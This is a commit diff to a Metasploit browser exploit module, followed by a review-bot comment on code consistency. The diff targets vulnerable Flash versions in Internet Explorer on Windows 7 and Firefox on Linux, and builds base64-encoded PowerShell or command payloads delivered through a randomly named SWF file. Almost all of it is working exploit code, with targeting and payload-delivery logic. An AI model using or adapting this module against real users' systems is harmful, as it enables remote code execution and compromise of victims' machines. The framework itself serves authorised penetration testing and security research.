Use all the BES power

unstable
jvazquez-r7 2015-05-21 14:06:41 -05:00
parent 4a5d2d1d24
commit b9f9647ab1
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 22 additions and 6 deletions


@ -45,16 +45,31 @@ class Metasploit3 < Msf::Exploit::Remote
'BrowserRequirements' => 'BrowserRequirements' =>
{ {
:source => /script|headers/i, :source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os| :os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 os =~ OperatingSystems::Match::WINDOWS_7
end, end,
:ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) }, :ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver| :flash => lambda do |ver|
(ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')) || case target.name
(ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')) when 'Windows'
end, return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')
:arch => ARCH_X86 when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')
end
false
end
}, },
'Targets' => 'Targets' =>
[ [
@ -97,13 +112,14 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit_template(cli, target_info) def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
if target.name =~ /Windows/ if target.name =~ /Windows/
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload) b64_payload = Rex::Text.encode_base64(psh_payload)
platform_id = 'win' platform_id = 'win'
elsif target.name =~ /Linux/ elsif target.name =~ /Linux/
target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
b64_payload = Rex::Text.encode_base64(target_payload) b64_payload = Rex::Text.encode_base64(target_payload)
platform_id = 'linux' platform_id = 'linux'
end end
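Review bot: The new `:ua_name` and `:flash` lambdas select on `target.name` with exact matches (`when 'Windows'`, `when 'Linux'`), while `exploit_template` in the second hunk still tests the same value with `=~ /Windows/` and `=~ /Linux/`, so the two places can disagree for any target whose name is not exactly one of those strings. The `Targets` list is cut off by the hunk, so whether such a name exists cannot be confirmed from here; using one form in both places, for example `when /Windows/` in the lambdas, would remove the doubt. The lambdas would also read more plainly without the `return true if ...` / `false` pair, letting each branch yield the comparison itself, e.g. `when 'Windows' then ua == Msf::HttpClients::IE` with a closing `else false`. Both the `BrowserRequirements` hash and `exploit_template` continue outside the visible lines.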